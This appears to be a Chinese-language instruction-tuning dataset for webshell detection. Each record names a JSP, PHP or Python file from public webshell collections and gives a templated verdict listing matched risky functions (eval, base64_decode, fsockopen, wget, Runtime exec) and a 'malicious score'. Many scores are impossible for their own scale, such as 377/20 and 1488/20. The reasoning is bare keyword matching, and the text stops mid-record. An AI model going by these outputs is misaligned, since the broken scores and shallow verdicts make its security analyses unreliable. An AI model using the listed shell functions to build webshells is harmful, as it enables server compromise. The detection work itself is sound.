{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"proxy.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"4751 bytes\", \"行数\": 76}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, method.invoke 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/21/proxy.jsp", "malicious_score": 6, "md5_hash": "2be7e9e0e7270439244d59b22aa3655a"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bcel.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"4615 bytes\", \"行数\": 73}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, request.getParameter, Class.forName 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/21/bcel.jsp", "malicious_score": 15, "md5_hash": "a29bed2aa144cf24b70a08152f747f00"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"8.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"859 bytes\", \"行数\": 25}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, ProcessBuilder( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/8/8.jsp", "malicious_score": 6, "md5_hash": "93dde0892d18f6ca512438531b09ce7d"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"10.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"4365 bytes\", \"行数\": 37}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, URLClassLoader, ScriptEngine 恶意度评分: 21/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/10/10.jsp", "malicious_score": 21, "md5_hash": "f4a47e064f06b11f0bbe0c57f85c50f9"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"20.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"4036 bytes\", \"行数\": 26}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, method.invoke 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/20/20.jsp", "malicious_score": 6, "md5_hash": "4612a9591af758c713b0fb14c323f16f"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"6.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"4718 bytes\", \"行数\": 45}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/6/6.jsp", "malicious_score": 6, "md5_hash": "8473971f703c8d79d0cddecd95532da2"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"5.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"3091 bytes\", \"行数\": 57}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, URLClassLoader, exec(, Runtime.getRuntime() 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/5/5.jsp", "malicious_score": 15, "md5_hash": "6f8b385b12073723bd6d92cce8c1701f"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"19.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"510 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, ScriptEngine, exec(, Runtime.getRuntime() 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/19/19.jsp", "malicious_score": 12, "md5_hash": "ebf3eb931a8be5ed024890b1a8a5bc58"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"19_2.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"279 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, ScriptEngine 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/19/19_2.jsp", "malicious_score": 6, "md5_hash": "1d561ec31e51f7c645016ca305555b13"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"16.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"3526 bytes\", \"行数\": 17}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, URLClassLoader 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/16/16.jsp", "malicious_score": 6, "md5_hash": "af905167fdc035cc075752efe36e1e56"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"17.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"767 bytes\", \"行数\": 22}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/17/17.jsp", "malicious_score": 9, "md5_hash": "fbecb7dd92c2fb85c04f60c3458da19d"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"17_2.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"1696 bytes\", \"行数\": 48}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/17/17_2.jsp", "malicious_score": 6, "md5_hash": "d63731e9e5dd31bae370a132c5728927"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"22.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"698 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, ProcessBuilder( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/22/22.jsp", "malicious_score": 6, "md5_hash": "9ef3d84c58c1af53e4836483db7c39fc"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"9.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"1684 bytes\", \"行数\": 38}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: Method.invoke, request.getParameter, Class.forName 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/9/9.jsp", "malicious_score": 9, "md5_hash": "c5d5bc36ff7398c08bb9a0bcae0c1772"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"4.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"421 bytes\", \"行数\": 11}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, URLClassLoader 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/4/4.jsp", "malicious_score": 12, "md5_hash": "3f99ebd9cac18130a3f0cb2eeafe84b9"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"7.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"1326 bytes\", \"行数\": 33}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/7/7.jsp", "malicious_score": 6, "md5_hash": "c71f99ae0d38281298eeb927274385ed"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"14_2.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"1250 bytes\", \"行数\": 26}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, ScriptEngine 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/14/14_2.jsp", "malicious_score": 6, "md5_hash": "8b7188c54ab0d8f85a27621a68f022ab"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"14.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"1276 bytes\", \"行数\": 29}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, ScriptEngine 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/14/14.jsp", "malicious_score": 6, "md5_hash": "a5835b3faa3c5e7ee37c2a254085ea54"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"3.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"1080 bytes\", \"行数\": 26}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, ScriptEngine 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/3/3.jsp", "malicious_score": 12, "md5_hash": "a44870b91d521a0189add4e677ec5843"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"12.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"4739 bytes\", \"行数\": 39}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: URLClassLoader, request.getParameter, Class.forName 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/12/12.jsp", "malicious_score": 12, "md5_hash": "0e5a46a3a5e4ba7d2c59773e5f718a06"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"php_niu_3.php\", \"文件类型\": \"php\", \"文件大小\": \"1106 bytes\", \"行数\": 35}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, ASSERT( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php_niu_3.php", "malicious_score": 6, "md5_hash": "f3b099d00fddd8440c8e503a274b7353"}} {"instruction": "分析这个python文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"create_webshell_with_py.py\", \"文件类型\": \"python\", \"文件大小\": \"2291 bytes\", \"行数\": 81}", "output": "这是一个python类型的webshell文件。 检测到恶意函数: eval( 发现混淆技术: ord\\s*\\(, chr\\s*\\( 恶意度评分: 7/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_python_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/create_webshell_with_py.py", "malicious_score": 7, "md5_hash": "6d24553d19d35868c066a08fe41861be"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"zone_hackbar_other.php\", \"文件类型\": \"php\", \"文件大小\": \"81 bytes\", \"行数\": 6}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 11/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/zone_hackbar_other.php", "malicious_score": 11, "md5_hash": "13a0c38ec6d8b21c54d2337cf2e02f40"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"upsi1on.php\", \"文件类型\": \"php\", \"文件大小\": \"25061 bytes\", \"行数\": 1212}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, $_COOKIE[, eval (, $_POST[, Exec ( 发现混淆技术: chr\\s*\\( 恶意度评分: 377/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/upsi1on.php", "malicious_score": 377, "md5_hash": "bb5a86067a5a5ba36f94fb3b330ad6a1"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"某变异pHp一句话木马.php\", \"文件类型\": \"php\", \"文件大小\": \"284 bytes\", \"行数\": 11}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: preg_replace(\"/f/e, $_GET[ 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/某变异pHp一句话木马.php", "malicious_score": 15, "md5_hash": "14c7281fdaf2ae004ca5fec8753ce3cb"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"r00ts php大马.php\", \"文件类型\": \"php\", \"文件大小\": \"151476 bytes\", \"行数\": 2557}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: fsockopen, socket_create 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1140/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/r00ts php大马.php", "malicious_score": 1140, "md5_hash": "29613d324e398df764514c4af145e3be"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"angel大马.php\", \"文件类型\": \"php\", \"文件大小\": \"75224 bytes\", \"行数\": 2144}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: preg_replace(\"/[email]/e, file_get_contents(, fwrite(, $_COOKIE[, fputs( 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 101/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/angel大马.php", "malicious_score": 101, "md5_hash": "f299ed793cf7ff495f89793cbed98057"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"asw.php\", \"文件类型\": \"php\", \"文件大小\": \"131933 bytes\", \"行数\": 3984}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, file_get_contents(, fwrite(, $_POST[ 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: fsockopen, socket_create, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 653/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/asw.php", "malicious_score": 653, "md5_hash": "de75843f673a5edd21489f6690a29c35"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"牛X的pHp一句话.php\", \"文件类型\": \"php\", \"文件大小\": \"94 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, eval(, $_GET[ 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/牛X的pHp一句话.php", "malicious_score": 9, "md5_hash": "fbf2e76e6f897f6f42b896c855069276"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bypass2021-01-04-01.php\", \"文件类型\": \"php\", \"文件大小\": \"97 bytes\", \"行数\": 11}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, eval( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/bypass2021-01-04-01.php", "malicious_score": 6, "md5_hash": "1d885d1378c8b9e467ceebfe7976fd76"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"h6ss.php\", \"文件类型\": \"php\", \"文件大小\": \"29155 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/h6ss.php", "malicious_score": 8, "md5_hash": "272dde9a4a7265d6c139287560328cd5"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"20220213_04.php\", \"文件类型\": \"php\", \"文件大小\": \"149 bytes\", \"行数\": 2}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_COOKIE[, file_get_contents(, base64_decode( 发现混淆技术: base64_decode 具备文件操作能力: file_put_contents 恶意度评分: 21/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/20220213_04.php", "malicious_score": 21, "md5_hash": "5c9367b2f64c1608d0e5a4aa4684d4d9"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"icesword.php\", \"文件类型\": \"php\", \"文件大小\": \"157083 bytes\", \"行数\": 2719}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: fsockopen, socket_create 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1488/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/icesword.php", "malicious_score": 1488, "md5_hash": "869b8d19dcc0dd3af69bda688c048ba9"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"xslt.php\", \"文件类型\": \"php\", \"文件大小\": \"539 bytes\", \"行数\": 15}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: assert(, $_POST[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/xslt.php", "malicious_score": 6, "md5_hash": "70523edfee6c387ed98472ce751680f0"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"tk_dencode_1.php\", \"文件类型\": \"php\", \"文件大小\": \"1489 bytes\", \"行数\": 52}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/tk_dencode_1.php", "malicious_score": 8, "md5_hash": "7b79d1fd5a9eb6ef296e7ac7082acc54"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bypass-waf-2015-06-10-01.php\", \"文件类型\": \"php\", \"文件大小\": \"995 bytes\", \"行数\": 20}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: call_user_func(, file_get_contents(, create_function( 发现混淆技术: pack\\s*\\( 恶意度评分: 11/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/bypass-waf-2015-06-10-01.php", "malicious_score": 11, "md5_hash": "07d8298116bf082798db968b12ba7e28"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"silic.php\", \"文件类型\": \"php\", \"文件大小\": \"137968 bytes\", \"行数\": 2210}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, gzinflate(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: fsockopen, socket_create 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1240/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/silic.php", "malicious_score": 1240, "md5_hash": "0eeeab57ac81dd322d65038c0be730ec"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bypass-with-base32.php\", \"文件类型\": \"php\", \"文件大小\": \"1554 bytes\", \"行数\": 69}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[ 发现混淆技术: ord\\s*\\(, chr\\s*\\( 恶意度评分: 7/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/bypass-with-base32.php", "malicious_score": 7, "md5_hash": "67c48b6129016b77289796b1958e6cd8"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2022-08-26-04.php\", \"文件类型\": \"php\", \"文件大小\": \"50 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[ 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/2022-08-26-04.php", "malicious_score": 9, "md5_hash": "4d98130356cf3444ead7ec40be2408e0"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2020.08.20.16.php\", \"文件类型\": \"php\", \"文件大小\": \"120 bytes\", \"行数\": 5}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, $_REQUEST[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/2020.08.20.16.php", "malicious_score": 6, "md5_hash": "fd69c867e13f2e4eabde3dbf298edeb4"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ucen.php\", \"文件类型\": \"php\", \"文件大小\": \"618475 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/ucen.php", "malicious_score": 8, "md5_hash": "4fcc7b4c9c8c18ad749012774c1dc57e"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"aioshell.php\", \"文件类型\": \"php\", \"文件大小\": \"33190 bytes\", \"行数\": 1204}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_GET[, $_POST[, exec( 包含网络功能: fsockopen, socket_create 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 157/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/aioshell.php", "malicious_score": 157, "md5_hash": "9b795afa8397ac0281c31398273e28b6"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"no2.php\", \"文件类型\": \"php\", \"文件大小\": \"1120 bytes\", \"行数\": 34}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, ASSERT(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 11/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/no2.php", "malicious_score": 11, "md5_hash": "f7f1328a6ddb481368aa24a9d29762f9"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2022-08-26-02.php\", \"文件类型\": \"php\", \"文件大小\": \"44 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[ 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/2022-08-26-02.php", "malicious_score": 9, "md5_hash": "31cf895da88f0d3616b0da19864180d3"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cvwfzthj.php\", \"文件类型\": \"php\", \"文件大小\": \"85779 bytes\", \"行数\": 1181}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: base64_decode (, create_function ( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/cvwfzthj.php", "malicious_score": 8, "md5_hash": "3f63e22f57d872da8c564416dccc280d"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"gzismexv.php\", \"文件类型\": \"php\", \"文件大小\": \"85801 bytes\", \"行数\": 1181}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: base64_decode (, create_function ( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/gzismexv.php", "malicious_score": 8, "md5_hash": "1da385d0d74c507a51c99a97eec799b5"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"一句话2015-06-10-03.php\", \"文件类型\": \"php\", \"文件大小\": \"189 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/一句话2015-06-10-03.php", "malicious_score": 8, "md5_hash": "9305d71f61bdfe96c8ace7a31a006c72"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2022-08-26-05.php\", \"文件类型\": \"php\", \"文件大小\": \"62 bytes\", \"行数\": 2}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: 